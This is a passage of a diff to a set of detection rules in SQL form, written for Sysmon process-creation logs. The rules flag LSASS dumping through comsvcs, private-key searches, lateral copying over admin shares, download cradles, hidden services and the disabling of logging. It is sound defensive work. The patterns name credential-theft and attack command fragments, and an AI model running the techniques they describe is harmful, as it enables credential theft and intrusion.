"attack.credential_access", + 
"attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ], + "falsepositives": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + }, + { + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR 
(CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' 
OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "status": "stable", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the 
executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' 
ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND 
(CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": 
"Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "attack.execution", + "attack.t1059" ], - "filename": "proc_creation_win_lolbin_tracker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE 
'%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" - ], + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR 
CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "status": "experimental", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE 